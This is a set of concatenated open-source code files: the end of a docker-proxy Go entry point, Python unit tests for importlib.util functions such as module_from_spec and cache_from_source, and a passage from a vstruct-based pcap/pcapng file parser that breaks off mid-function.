flag.BoolVar(&printVer, "v", false, "print version information and quit")
flag.BoolVar(&printVer, "version", false, "print version information and quit")
flag.Parse()
if printVer {
fmt.Printf("docker-proxy (commit %s) version %s\n", dockerversion.GitCommit, dockerversion.Version)
os.Exit(0)
}
if useListenFd {
_ = syscall.SetNonblock(int(listenSockFd), true)
config.ListenSock = os.NewFile(listenSockFd, "listen-sock")
}
return config
}
func handleStopSignals(p Proxy) {
s := make(chan os.Signal, 10)
signal.Notify(s, os.Interrupt, syscall.SIGTERM)
for range s {
p.Close()
os.Exit(0)
}
} | go | github | https://github.com/moby/moby | cmd/docker-proxy/main_linux.go |
from . import util
abc = util.import_importlib('importlib.abc')
init = util.import_importlib('importlib')
machinery = util.import_importlib('importlib.machinery')
importlib_util = util.import_importlib('importlib.util')
import os
import string
import sys
from test import support
import types
import unittest
import warnings
class DecodeSourceBytesTests:
source = "string ='ü'"
def test_ut8_default(self):
source_bytes = self.source.encode('utf-8')
self.assertEqual(self.util.decode_source(source_bytes), self.source)
def test_specified_encoding(self):
source = '# coding=latin-1\n' + self.source
source_bytes = source.encode('latin-1')
assert source_bytes != source.encode('utf-8')
self.assertEqual(self.util.decode_source(source_bytes), source)
def test_universal_newlines(self):
source = '\r\n'.join([self.source, self.source])
source_bytes = source.encode('utf-8')
self.assertEqual(self.util.decode_source(source_bytes),
'\n'.join([self.source, self.source]))
(Frozen_DecodeSourceBytesTests,
Source_DecodeSourceBytesTests
) = util.test_both(DecodeSourceBytesTests, util=importlib_util)
class ModuleFromSpecTests:
def test_no_create_module(self):
class Loader:
def exec_module(self, module):
pass
spec = self.machinery.ModuleSpec('test', Loader())
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
module = self.util.module_from_spec(spec)
self.assertEqual(1, len(w))
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
self.assertIn('create_module', str(w[0].message))
self.assertIsInstance(module, types.ModuleType)
self.assertEqual(module.__name__, spec.name)
def test_create_module_returns_None(self):
class Loader(self.abc.Loader):
def create_module(self, spec):
return None
spec = self.machinery.ModuleSpec('test', Loader())
module = self.util.module_from_spec(spec)
self.assertIsInstance(module, types.ModuleType)
self.assertEqual(module.__name__, spec.name)
def test_create_module(self):
name = 'already set'
class CustomModule(types.ModuleType):
pass
class Loader(self.abc.Loader):
def create_module(self, spec):
module = CustomModule(spec.name)
module.__name__ = name
return module
spec = self.machinery.ModuleSpec('test', Loader())
module = self.util.module_from_spec(spec)
self.assertIsInstance(module, CustomModule)
self.assertEqual(module.__name__, name)
def test___name__(self):
spec = self.machinery.ModuleSpec('test', object())
module = self.util.module_from_spec(spec)
self.assertEqual(module.__name__, spec.name)
def test___spec__(self):
spec = self.machinery.ModuleSpec('test', object())
module = self.util.module_from_spec(spec)
self.assertEqual(module.__spec__, spec)
def test___loader__(self):
loader = object()
spec = self.machinery.ModuleSpec('test', loader)
module = self.util.module_from_spec(spec)
self.assertIs(module.__loader__, loader)
def test___package__(self):
spec = self.machinery.ModuleSpec('test.pkg', object())
module = self.util.module_from_spec(spec)
self.assertEqual(module.__package__, spec.parent)
def test___path__(self):
spec = self.machinery.ModuleSpec('test', object(), is_package=True)
module = self.util.module_from_spec(spec)
self.assertEqual(module.__path__, spec.submodule_search_locations)
def test___file__(self):
spec = self.machinery.ModuleSpec('test', object(), origin='some/path')
spec.has_location = True
module = self.util.module_from_spec(spec)
self.assertEqual(module.__file__, spec.origin)
def test___cached__(self):
spec = self.machinery.ModuleSpec('test', object())
spec.cached = 'some/path'
spec.has_location = True
module = self.util.module_from_spec(spec)
self.assertEqual(module.__cached__, spec.cached)
(Frozen_ModuleFromSpecTests,
Source_ModuleFromSpecTests
) = util.test_both(ModuleFromSpecTests, abc=abc, machinery=machinery,
util=importlib_util)
class ModuleForLoaderTests:
"""Tests for importlib.util.module_for_loader."""
@classmethod
def module_for_loader(cls, func):
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
return cls.util.module_for_loader(func)
def test_warning(self):
# Should raise a PendingDeprecationWarning when used.
with warnings.catch_warnings():
warnings.simplefilter('error', DeprecationWarning)
with self.assertRaises(DeprecationWarning):
func = self.util.module_for_loader(lambda x: x)
def return_module(self, name):
fxn = self.module_for_loader(lambda self, module: module)
return fxn(self, name)
def raise_exception(self, name):
def to_wrap(self, module):
raise ImportError
fxn = self.module_for_loader(to_wrap)
try:
fxn(self, name)
except ImportError:
pass
def test_new_module(self):
# Test that when no module exists in sys.modules a new module is
# created.
module_name = 'a.b.c'
with util.uncache(module_name):
module = self.return_module(module_name)
self.assertIn(module_name, sys.modules)
self.assertIsInstance(module, types.ModuleType)
self.assertEqual(module.__name__, module_name)
def test_reload(self):
# Test that a module is reused if already in sys.modules.
class FakeLoader:
def is_package(self, name):
return True
@self.module_for_loader
def load_module(self, module):
return module
name = 'a.b.c'
module = types.ModuleType('a.b.c')
module.__loader__ = 42
module.__package__ = 42
with util.uncache(name):
sys.modules[name] = module
loader = FakeLoader()
returned_module = loader.load_module(name)
self.assertIs(returned_module, sys.modules[name])
self.assertEqual(module.__loader__, loader)
self.assertEqual(module.__package__, name)
def test_new_module_failure(self):
# Test that a module is removed from sys.modules if added but an
# exception is raised.
name = 'a.b.c'
with util.uncache(name):
self.raise_exception(name)
self.assertNotIn(name, sys.modules)
def test_reload_failure(self):
# Test that a failure on reload leaves the module in-place.
name = 'a.b.c'
module = types.ModuleType(name)
with util.uncache(name):
sys.modules[name] = module
self.raise_exception(name)
self.assertIs(module, sys.modules[name])
def test_decorator_attrs(self):
def fxn(self, module): pass
wrapped = self.module_for_loader(fxn)
self.assertEqual(wrapped.__name__, fxn.__name__)
self.assertEqual(wrapped.__qualname__, fxn.__qualname__)
def test_false_module(self):
# If for some odd reason a module is considered false, still return it
# from sys.modules.
class FalseModule(types.ModuleType):
def __bool__(self): return False
name = 'mod'
module = FalseModule(name)
with util.uncache(name):
self.assertFalse(module)
sys.modules[name] = module
given = self.return_module(name)
self.assertIs(given, module)
def test_attributes_set(self):
# __name__, __loader__, and __package__ should be set (when
# is_package() is defined; undefined implicitly tested elsewhere).
class FakeLoader:
def __init__(self, is_package):
self._pkg = is_package
def is_package(self, name):
return self._pkg
@self.module_for_loader
def load_module(self, module):
return module
name = 'pkg.mod'
with util.uncache(name):
loader = FakeLoader(False)
module = loader.load_module(name)
self.assertEqual(module.__name__, name)
self.assertIs(module.__loader__, loader)
self.assertEqual(module.__package__, 'pkg')
name = 'pkg.sub'
with util.uncache(name):
loader = FakeLoader(True)
module = loader.load_module(name)
self.assertEqual(module.__name__, name)
self.assertIs(module.__loader__, loader)
self.assertEqual(module.__package__, name)
(Frozen_ModuleForLoaderTests,
Source_ModuleForLoaderTests
) = util.test_both(ModuleForLoaderTests, util=importlib_util)
class SetPackageTests:
"""Tests for importlib.util.set_package."""
def verify(self, module, expect):
"""Verify the module has the expected value for __package__ after
passing through set_package."""
fxn = lambda: module
wrapped = self.util.set_package(fxn)
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
wrapped()
self.assertTrue(hasattr(module, '__package__'))
self.assertEqual(expect, module.__package__)
def test_top_level(self):
# __package__ should be set to the empty string if a top-level module.
# Implicitly tests when package is set to None.
module = types.ModuleType('module')
module.__package__ = None
self.verify(module, '')
def test_package(self):
# Test setting __package__ for a package.
module = types.ModuleType('pkg')
module.__path__ = ['<path>']
module.__package__ = None
self.verify(module, 'pkg')
def test_submodule(self):
# Test __package__ for a module in a package.
module = types.ModuleType('pkg.mod')
module.__package__ = None
self.verify(module, 'pkg')
def test_setting_if_missing(self):
# __package__ should be set if it is missing.
module = types.ModuleType('mod')
if hasattr(module, '__package__'):
delattr(module, '__package__')
self.verify(module, '')
def test_leaving_alone(self):
# If __package__ is set and not None then leave it alone.
for value in (True, False):
module = types.ModuleType('mod')
module.__package__ = value
self.verify(module, value)
def test_decorator_attrs(self):
def fxn(module): pass
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
wrapped = self.util.set_package(fxn)
self.assertEqual(wrapped.__name__, fxn.__name__)
self.assertEqual(wrapped.__qualname__, fxn.__qualname__)
(Frozen_SetPackageTests,
Source_SetPackageTests
) = util.test_both(SetPackageTests, util=importlib_util)
class SetLoaderTests:
"""Tests importlib.util.set_loader()."""
@property
def DummyLoader(self):
# Set DummyLoader on the class lazily.
class DummyLoader:
@self.util.set_loader
def load_module(self, module):
return self.module
self.__class__.DummyLoader = DummyLoader
return DummyLoader
def test_no_attribute(self):
loader = self.DummyLoader()
loader.module = types.ModuleType('blah')
try:
del loader.module.__loader__
except AttributeError:
pass
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
self.assertEqual(loader, loader.load_module('blah').__loader__)
def test_attribute_is_None(self):
loader = self.DummyLoader()
loader.module = types.ModuleType('blah')
loader.module.__loader__ = None
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
self.assertEqual(loader, loader.load_module('blah').__loader__)
def test_not_reset(self):
loader = self.DummyLoader()
loader.module = types.ModuleType('blah')
loader.module.__loader__ = 42
with warnings.catch_warnings():
warnings.simplefilter('ignore', DeprecationWarning)
self.assertEqual(42, loader.load_module('blah').__loader__)
(Frozen_SetLoaderTests,
Source_SetLoaderTests
) = util.test_both(SetLoaderTests, util=importlib_util)
class ResolveNameTests:
"""Tests importlib.util.resolve_name()."""
def test_absolute(self):
# bacon
self.assertEqual('bacon', self.util.resolve_name('bacon', None))
def test_aboslute_within_package(self):
# bacon in spam
self.assertEqual('bacon', self.util.resolve_name('bacon', 'spam'))
def test_no_package(self):
# .bacon in ''
with self.assertRaises(ValueError):
self.util.resolve_name('.bacon', '')
def test_in_package(self):
# .bacon in spam
self.assertEqual('spam.eggs.bacon',
self.util.resolve_name('.bacon', 'spam.eggs'))
def test_other_package(self):
# ..bacon in spam.bacon
self.assertEqual('spam.bacon',
self.util.resolve_name('..bacon', 'spam.eggs'))
def test_escape(self):
# ..bacon in spam
with self.assertRaises(ValueError):
self.util.resolve_name('..bacon', 'spam')
(Frozen_ResolveNameTests,
Source_ResolveNameTests
) = util.test_both(ResolveNameTests, util=importlib_util)
class FindSpecTests:
class FakeMetaFinder:
@staticmethod
def find_spec(name, path=None, target=None): return name, path, target
def test_sys_modules(self):
name = 'some_mod'
with util.uncache(name):
module = types.ModuleType(name)
loader = 'a loader!'
spec = self.machinery.ModuleSpec(name, loader)
module.__loader__ = loader
module.__spec__ = spec
sys.modules[name] = module
found = self.util.find_spec(name)
self.assertEqual(found, spec)
def test_sys_modules_without___loader__(self):
name = 'some_mod'
with util.uncache(name):
module = types.ModuleType(name)
del module.__loader__
loader = 'a loader!'
spec = self.machinery.ModuleSpec(name, loader)
module.__spec__ = spec
sys.modules[name] = module
found = self.util.find_spec(name)
self.assertEqual(found, spec)
def test_sys_modules_spec_is_None(self):
name = 'some_mod'
with util.uncache(name):
module = types.ModuleType(name)
module.__spec__ = None
sys.modules[name] = module
with self.assertRaises(ValueError):
self.util.find_spec(name)
def test_sys_modules_loader_is_None(self):
name = 'some_mod'
with util.uncache(name):
module = types.ModuleType(name)
spec = self.machinery.ModuleSpec(name, None)
module.__spec__ = spec
sys.modules[name] = module
found = self.util.find_spec(name)
self.assertEqual(found, spec)
def test_sys_modules_spec_is_not_set(self):
name = 'some_mod'
with util.uncache(name):
module = types.ModuleType(name)
try:
del module.__spec__
except AttributeError:
pass
sys.modules[name] = module
with self.assertRaises(ValueError):
self.util.find_spec(name)
def test_success(self):
name = 'some_mod'
with util.uncache(name):
with util.import_state(meta_path=[self.FakeMetaFinder]):
self.assertEqual((name, None, None),
self.util.find_spec(name))
def test_nothing(self):
# None is returned upon failure to find a loader.
self.assertIsNone(self.util.find_spec('nevergoingtofindthismodule'))
def test_find_submodule(self):
name = 'spam'
subname = 'ham'
with util.temp_module(name, pkg=True) as pkg_dir:
fullname, _ = util.submodule(name, subname, pkg_dir)
spec = self.util.find_spec(fullname)
self.assertIsNot(spec, None)
self.assertIn(name, sorted(sys.modules))
self.assertNotIn(fullname, sorted(sys.modules))
# Ensure successive calls behave the same.
spec_again = self.util.find_spec(fullname)
self.assertEqual(spec_again, spec)
def test_find_submodule_parent_already_imported(self):
name = 'spam'
subname = 'ham'
with util.temp_module(name, pkg=True) as pkg_dir:
self.init.import_module(name)
fullname, _ = util.submodule(name, subname, pkg_dir)
spec = self.util.find_spec(fullname)
self.assertIsNot(spec, None)
self.assertIn(name, sorted(sys.modules))
self.assertNotIn(fullname, sorted(sys.modules))
# Ensure successive calls behave the same.
spec_again = self.util.find_spec(fullname)
self.assertEqual(spec_again, spec)
def test_find_relative_module(self):
name = 'spam'
subname = 'ham'
with util.temp_module(name, pkg=True) as pkg_dir:
fullname, _ = util.submodule(name, subname, pkg_dir)
relname = '.' + subname
spec = self.util.find_spec(relname, name)
self.assertIsNot(spec, None)
self.assertIn(name, sorted(sys.modules))
self.assertNotIn(fullname, sorted(sys.modules))
# Ensure successive calls behave the same.
spec_again = self.util.find_spec(fullname)
self.assertEqual(spec_again, spec)
def test_find_relative_module_missing_package(self):
name = 'spam'
subname = 'ham'
with util.temp_module(name, pkg=True) as pkg_dir:
fullname, _ = util.submodule(name, subname, pkg_dir)
relname = '.' + subname
with self.assertRaises(ValueError):
self.util.find_spec(relname)
self.assertNotIn(name, sorted(sys.modules))
self.assertNotIn(fullname, sorted(sys.modules))
(Frozen_FindSpecTests,
Source_FindSpecTests
) = util.test_both(FindSpecTests, init=init, util=importlib_util,
machinery=machinery)
class MagicNumberTests:
def test_length(self):
# Should be 4 bytes.
self.assertEqual(len(self.util.MAGIC_NUMBER), 4)
def test_incorporates_rn(self):
# The magic number uses \r\n to come out wrong when splitting on lines.
self.assertTrue(self.util.MAGIC_NUMBER.endswith(b'\r\n'))
(Frozen_MagicNumberTests,
Source_MagicNumberTests
) = util.test_both(MagicNumberTests, util=importlib_util)
class PEP3147Tests:
"""Tests of PEP 3147-related functions: cache_from_source and source_from_cache."""
tag = sys.implementation.cache_tag
@unittest.skipUnless(sys.implementation.cache_tag is not None,
'requires sys.implementation.cache_tag not be None')
def test_cache_from_source(self):
# Given the path to a .py file, return the path to its PEP 3147
# defined .pyc file (i.e. under __pycache__).
path = os.path.join('foo', 'bar', 'baz', 'qux.py')
expect = os.path.join('foo', 'bar', 'baz', '__pycache__',
'qux.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_no_cache_tag(self):
# No cache tag means NotImplementedError.
with support.swap_attr(sys.implementation, 'cache_tag', None):
with self.assertRaises(NotImplementedError):
self.util.cache_from_source('whatever.py')
def test_cache_from_source_no_dot(self):
# Directory with a dot, filename without dot.
path = os.path.join('foo.bar', 'file')
expect = os.path.join('foo.bar', '__pycache__',
'file{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_debug_override(self):
# Given the path to a .py file, return the path to its PEP 3147/PEP 488
# defined .pyc file (i.e. under __pycache__).
path = os.path.join('foo', 'bar', 'baz', 'qux.py')
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(self.util.cache_from_source(path, False),
self.util.cache_from_source(path, optimization=1))
self.assertEqual(self.util.cache_from_source(path, True),
self.util.cache_from_source(path, optimization=''))
with warnings.catch_warnings():
warnings.simplefilter('error')
with self.assertRaises(DeprecationWarning):
self.util.cache_from_source(path, False)
with self.assertRaises(DeprecationWarning):
self.util.cache_from_source(path, True)
def test_cache_from_source_cwd(self):
path = 'foo.py'
expect = os.path.join('__pycache__', 'foo.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_override(self):
# When debug_override is not None, it can be any true-ish or false-ish
# value.
path = os.path.join('foo', 'bar', 'baz.py')
# However if the bool-ishness can't be determined, the exception
# propagates.
class Bearish:
def __bool__(self): raise RuntimeError
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(self.util.cache_from_source(path, []),
self.util.cache_from_source(path, optimization=1))
self.assertEqual(self.util.cache_from_source(path, [17]),
self.util.cache_from_source(path, optimization=''))
with self.assertRaises(RuntimeError):
self.util.cache_from_source('/foo/bar/baz.py', Bearish())
def test_cache_from_source_optimization_empty_string(self):
# Setting 'optimization' to '' leads to no optimization tag (PEP 488).
path = 'foo.py'
expect = os.path.join('__pycache__', 'foo.{}.pyc'.format(self.tag))
self.assertEqual(self.util.cache_from_source(path, optimization=''),
expect)
def test_cache_from_source_optimization_None(self):
# Setting 'optimization' to None uses the interpreter's optimization.
# (PEP 488)
path = 'foo.py'
optimization_level = sys.flags.optimize
almost_expect = os.path.join('__pycache__', 'foo.{}'.format(self.tag))
if optimization_level == 0:
expect = almost_expect + '.pyc'
elif optimization_level <= 2:
expect = almost_expect + '.opt-{}.pyc'.format(optimization_level)
else:
msg = '{!r} is a non-standard optimization level'.format(optimization_level)
self.skipTest(msg)
self.assertEqual(self.util.cache_from_source(path, optimization=None),
expect)
def test_cache_from_source_optimization_set(self):
# The 'optimization' parameter accepts anything that has a string repr
# that passes str.alnum().
path = 'foo.py'
valid_characters = string.ascii_letters + string.digits
almost_expect = os.path.join('__pycache__', 'foo.{}'.format(self.tag))
got = self.util.cache_from_source(path, optimization=valid_characters)
# Test all valid characters are accepted.
self.assertEqual(got,
almost_expect + '.opt-{}.pyc'.format(valid_characters))
# str() should be called on argument.
self.assertEqual(self.util.cache_from_source(path, optimization=42),
almost_expect + '.opt-42.pyc')
# Invalid characters raise ValueError.
with self.assertRaises(ValueError):
self.util.cache_from_source(path, optimization='path/is/bad')
def test_cache_from_source_debug_override_optimization_both_set(self):
# Can only set one of the optimization-related parameters.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
with self.assertRaises(TypeError):
self.util.cache_from_source('foo.py', False, optimization='')
@unittest.skipUnless(os.sep == '\\' and os.altsep == '/',
'test meaningful only where os.altsep is defined')
def test_sep_altsep_and_sep_cache_from_source(self):
# Windows path and PEP 3147 where sep is right of altsep.
self.assertEqual(
self.util.cache_from_source('\\foo\\bar\\baz/qux.py', optimization=''),
'\\foo\\bar\\baz\\__pycache__\\qux.{}.pyc'.format(self.tag))
@unittest.skipUnless(sys.implementation.cache_tag is not None,
'requires sys.implementation.cache_tag to not be '
'None')
def test_source_from_cache(self):
# Given the path to a PEP 3147 defined .pyc file, return the path to
# its source. This tests the good path.
path = os.path.join('foo', 'bar', 'baz', '__pycache__',
'qux.{}.pyc'.format(self.tag))
expect = os.path.join('foo', 'bar', 'baz', 'qux.py')
self.assertEqual(self.util.source_from_cache(path), expect)
def test_source_from_cache_no_cache_tag(self):
# If sys.implementation.cache_tag is None, raise NotImplementedError.
path = os.path.join('blah', '__pycache__', 'whatever.pyc')
with support.swap_attr(sys.implementation, 'cache_tag', None):
with self.assertRaises(NotImplementedError):
self.util.source_from_cache(path)
def test_source_from_cache_bad_path(self):
# When the path to a pyc file is not in PEP 3147 format, a ValueError
# is raised.
self.assertRaises(
ValueError, self.util.source_from_cache, '/foo/bar/bazqux.pyc')
def test_source_from_cache_no_slash(self):
# No slashes at all in path -> ValueError
self.assertRaises(
ValueError, self.util.source_from_cache, 'foo.cpython-32.pyc')
def test_source_from_cache_too_few_dots(self):
# Too few dots in final path component -> ValueError
self.assertRaises(
ValueError, self.util.source_from_cache, '__pycache__/foo.pyc')
def test_source_from_cache_too_many_dots(self):
with self.assertRaises(ValueError):
self.util.source_from_cache(
'__pycache__/foo.cpython-32.opt-1.foo.pyc')
def test_source_from_cache_not_opt(self):
# Non-`opt-` path component -> ValueError
self.assertRaises(
ValueError, self.util.source_from_cache,
'__pycache__/foo.cpython-32.foo.pyc')
def test_source_from_cache_no__pycache__(self):
# Another problem with the path -> ValueError
self.assertRaises(
ValueError, self.util.source_from_cache,
'/foo/bar/foo.cpython-32.foo.pyc')
def test_source_from_cache_optimized_bytecode(self):
# Optimized bytecode is not an issue.
path = os.path.join('__pycache__', 'foo.{}.opt-1.pyc'.format(self.tag))
self.assertEqual(self.util.source_from_cache(path), 'foo.py')
def test_source_from_cache_missing_optimization(self):
# An empty optimization level is a no-no.
path = os.path.join('__pycache__', 'foo.{}.opt-.pyc'.format(self.tag))
with self.assertRaises(ValueError):
self.util.source_from_cache(path)
(Frozen_PEP3147Tests,
Source_PEP3147Tests
) = util.test_both(PEP3147Tests, util=importlib_util)
if __name__ == '__main__':
unittest.main() | unknown | codeparrot/codeparrot-clean | ||
import vstruct
import vstruct.defs.inet as vs_inet
from vstruct.primitives import *
PCAP_LINKTYPE_ETHER = 1
PCAP_LINKTYPE_RAW = 101
PCAPNG_BOM = 0x1A2B3C4D
OPT_ENDOFOPT = 0
OPT_COMMENT = 1
#PCAPNG_BLOCKTYPE_SECTION_HEADER options
OPT_SHB_HARDWARE = 2
OPT_SHB_OS = 3
OPT_SHB_USERAPPL = 4
#PCAPNG_INTERFACE_DESCRIPTION_BLOCK options
OPT_IF_NAME = 2
OPT_IF_DESCRIPTION = 3
OPT_IF_IPV4ADDR = 4
OPT_IF_IPV6ADDR = 5
OPT_IF_MACADDR = 6
OPT_IF_EUIADDR = 7
OPT_IF_SPEED = 8
OPT_IF_TSRESOL = 9
OPT_IF_TZONE = 10
OPT_IF_FILTER = 11
OPT_IF_OS = 12
OPT_IF_FCSLEN = 13
OPT_IF_TSOFFSET = 14
# options for PCAPNG_ENHANCED_PACKET_BLOCK
OPT_EPB_FLAGS = 2
OPT_EPB_HASH = 3
OPT_EPB_DROPCOUNT = 4
# values used in the blocktype field
PCAPNG_BLOCKTYPE_INTERFACE_DESCRIPTION = 0x00000001
PCAPNG_BLOCKTYPE_PACKET = 0x00000002
PCAPNG_BLOCKTYPE_SIMPLE_PACKET = 0x00000003
PCAPNG_BLOCKTYPE_NAME_RESOLUTION = 0x00000004
PCAPNG_BLOCKTYPE_INTERFACE_STATS = 0x00000005
PCAPNG_BLOCKTYPE_ENHANCED_PACKET = 0x00000006
PCAPNG_BLOCKTYPE_SECTION_HEADER = 0x0a0d0d0a
def pad4bytes(size):
if (size % 4) == 0:
return size
return size + (4 -( size % 4))
class PCAP_FILE_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.magic = v_uint32()
self.vers_maj = v_uint16()
self.vers_min = v_uint16()
self.thiszone = v_uint32()
self.sigfigs = v_uint32()
self.snaplen = v_uint32()
self.linktype = v_uint32()
class PCAP_PACKET_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.tvsec = v_uint32()
self.tvusec = v_uint32()
self.caplen = v_uint32()
self.len = v_uint32()
class PCAPNG_GENERIC_BLOCK_HEADER(vstruct.VStruct):
'''
Used to read the block type & size when parsing the file
'''
def __init__(self, bigend=False):
vstruct.VStruct.__init__(self)
self.blocktype = v_uint32(bigend=bigend)
self.blocksize = v_uint32(bigend=bigend)
class PCAPNG_BLOCK_PARENT(vstruct.VStruct):
'''
Used to inherit the weird parsing style where there's variable length
options at the end, followed by the duplicate block total length
'''
def __init__(self, bigend=False):
vstruct.VStruct.__init__(self)
#non-vstruct field, set during checking BOM
self.bigend = False
def vsParse(self, bytez, offset=0):
startoff = offset
roff = vstruct.VStruct.vsParse(self, bytez, offset=offset)
#(blocksize-4): because we still need the trailing blocksize2
# apparently blocks can completely omit the options list and not
# even have the OPT_ENDOFOPT entry
while (roff < len(bytez)) and ((roff-startoff) < (self.blocksize-4)):
opt = PCAPNG_OPTION(bigend=self.bigend)
roff = opt.vsParse(bytez, roff)
if opt.code == OPT_ENDOFOPT:
break
self.options.vsAddElement(opt)
# append trailing blocksize2
bs2 = v_uint32(bigend=self.bigend)
self.vsAddField('blocksize2', bs2)
roff = bs2.vsParse(bytez, roff)
#pad, plus we skip
return pad4bytes(roff)
class PCAPNG_SECTION_HEADER_BLOCK(PCAPNG_BLOCK_PARENT):
def __init__(self, bigend=False):
PCAPNG_BLOCK_PARENT.__init__(self, bigend)
self.blocktype = v_uint32(bigend=bigend)
self.blocksize = v_uint32(bigend=bigend)
self.bom = v_uint32(bigend=bigend)
self.vers_maj = v_uint16(bigend=bigend)
self.vers_min = v_uint16(bigend=bigend)
self.sectionsize = v_uint64(bigend=bigend)
self.options = vstruct.VArray([])
#blocksize2: dynamcally added in vsParse()
#self.blocksize2 = v_uint32(bigend=bigend)
def pcb_bom(self):
bom = self.vsGetField('bom')
if self.bom == PCAPNG_BOM:
#if it matches, then the endian of bom is correct
self.bigend = bom._vs_bigend
else:
self.bigend = not bom._vs_bigend
class PCAPNG_OPTION(vstruct.VStruct):
def __init__(self, bigend=False):
vstruct.VStruct.__init__(self)
self.code = v_uint16(bigend=bigend)
self.optsize = v_uint16(bigend=bigend)
self.bytes = v_bytes(0)
def pcb_optsize(self):
size = pad4bytes(self.optsize)
self.vsGetField('bytes').vsSetLength(size)
class PCAPNG_INTERFACE_DESCRIPTION_BLOCK(PCAPNG_BLOCK_PARENT):
def __init__(self, bigend=False):
PCAPNG_BLOCK_PARENT.__init__(self, bigend)
self.blocktype = v_uint32(bigend=bigend)
self.blocksize = v_uint32(bigend=bigend)
self.linktype = v_uint16(bigend=bigend)
self.reserved = v_uint16(bigend=bigend)
self.snaplen = v_uint32(bigend=bigend)
self.options = vstruct.VArray([])
#blocksize2: dynamcally added in vsParse()
#self.blocksize2 = v_uint32(bigend=bigend)
def vsParse(self, bytez, offset=0):
'''
We need the tsresol value to adjust timestamp values, so pull it
out here
'''
ret = PCAPNG_BLOCK_PARENT.vsParse(self, bytez, offset=0)
self.tsresol = None
#default offset is 0
self.tsoffset = 0
#sys.stderr.write('PCAPNG_INTERFACE_DESCRIPTION_BLOCK: searching options')
for i, opt in self.options:
if opt.code == OPT_IF_TSRESOL:
self.tsresol = ord(opt.bytes[0])
#sys.stderr.write('Got tsresol: 0x%x\n' % self.tsresol)
elif opt.code == OPT_IF_TSOFFSET:
fmt = '<Q'
if self.bigend:
fmt = '>Q'
self.tsoffset = struct.unpack_from(fmt, opt.bytes)[0]
#sys.stderr.write('Got tsoffset: 0x%x\n' % self.tsoffset)
return ret
class PCAPNG_ENHANCED_PACKET_BLOCK(PCAPNG_BLOCK_PARENT):
def __init__(self, bigend=False):
PCAPNG_BLOCK_PARENT.__init__(self, bigend)
self.blocktype = v_uint32(bigend=bigend)
self.blocksize = v_uint32(bigend=bigend)
self.interfaceid = v_uint32(bigend=bigend)
self.tstamphi = v_uint32(bigend=bigend)
self.tstamplow = v_uint32(bigend=bigend)
self.caplen = v_uint32(bigend=bigend)
self.packetlen = v_uint32(bigend=bigend)
self.data = v_bytes(0)
self.options = vstruct.VArray([])
#blocksize2: dynamcally added in vsParse()
#self.blocksize2 = v_uint32(bigend=bigend)
def pcb_caplen(self):
size = pad4bytes(self.caplen)
self.vsGetField('data').vsSetLength(size)
def setPcapTimestamp(self, idb):
'''
Adds a libpcap compatible tvsec and tvusec fields, based on the pcapng timestamp
'''
#orange left off here
self.snaplen = idb.snaplen
tstamp = (self.tstamphi << 32) | self.tstamplow
scale = 1000000
if idb.tsresol is None:
#if not set, capture assumes 10e-6 resolution
pass
elif (0x80 & idb.tsresol) == 0:
# remaining bits are resolution, to a negative power of 10
scale = 10**(idb.tsresol & 0x7f)
else:
# remaining bits are resolution, to a negative power of 2
scale = 1 << (idb.tsresol & 0x7f)
self.tvsec = (tstamp / scale) + idb.tsoffset
self.tvusec = tstamp % scale
class PCAPNG_SIMPLE_PACKET_BLOCK(vstruct.VStruct):
'''
Note: no variable length options fields, so inheriting from vstruct directly
'''
def __init__(self, bigend=False):
vstruct.VStruct.__init__(self)
self.blocktype = v_uint32(bigend=bigend)
self.blocksize = v_uint32(bigend=bigend)
self.packetlen = v_uint32(bigend=bigend)
self.data = v_bytes(0)
self.blocksize2 = v_uint32(bigend=bigend)
def pcb_blocksize(self):
self.caplen = pad4bytes(self.blocksize - 16)
self.vsGetField('data').vsSetLength(self.caplen)
def setPcapTimestamp(self, idb):
#no timestamp in this type of block :(
self.tvsec = idb.tsoffset
self.tvusec = 0
def iterPcapFileName(filename, reuse=False):
fd = file(filename, 'rb')
for x in iterPcapFile(fd, reuse=reuse):
yield x
def iterPcapFile(fd, reuse=False):
'''
Figure out if it's a tcpdump format, or pcapng
'''
h = PCAP_FILE_HEADER()
b = fd.read(len(h))
h.vsParse(b, fast=True)
fd.seek(0)
if h.magic == PCAPNG_BLOCKTYPE_SECTION_HEADER:
return _iterPcapNgFile(fd, reuse)
return _iterPcapFile(fd, reuse)
def _iterPcapFile(fd, reuse=False):
h = PCAP_FILE_HEADER()
b = fd.read(len(h))
h.vsParse(b, fast=True)
linktype = h.linktype
if linktype not in (PCAP_LINKTYPE_ETHER, PCAP_LINKTYPE_RAW):
raise Exception('PCAP Link Type %d Not Supported Yet!' % linktype)
pkt = PCAP_PACKET_HEADER()
eII = vs_inet.ETHERII()
pktsize = len(pkt)
eIIsize = len(eII)
ipv4 = vs_inet.IPv4()
ipv4size = 20
tcp_hdr = vs_inet.TCP()
udp_hdr = vs_inet.UDP()
icmp_hdr = vs_inet.ICMP()
go = True
while go:
hdr = fd.read(pktsize)
if len(hdr) != pktsize:
break
pkt.vsParse(hdr, fast=True)
b = fd.read(pkt.caplen)
offset = 0
if linktype == PCAP_LINKTYPE_ETHER:
if len(b) < eIIsize:
continue
eII.vsParse(b, 0, fast=True)
# No support for non-ip protocol yet...
if eII.etype not in (vs_inet.ETH_P_IP,vs_inet.ETH_P_VLAN):
continue
offset += eIIsize
if eII.etype == vs_inet.ETH_P_VLAN:
offset += 4
elif linktype == PCAP_LINKTYPE_RAW:
pass
#print eII.tree()
if not reuse:
ipv4 = vs_inet.IPv4()
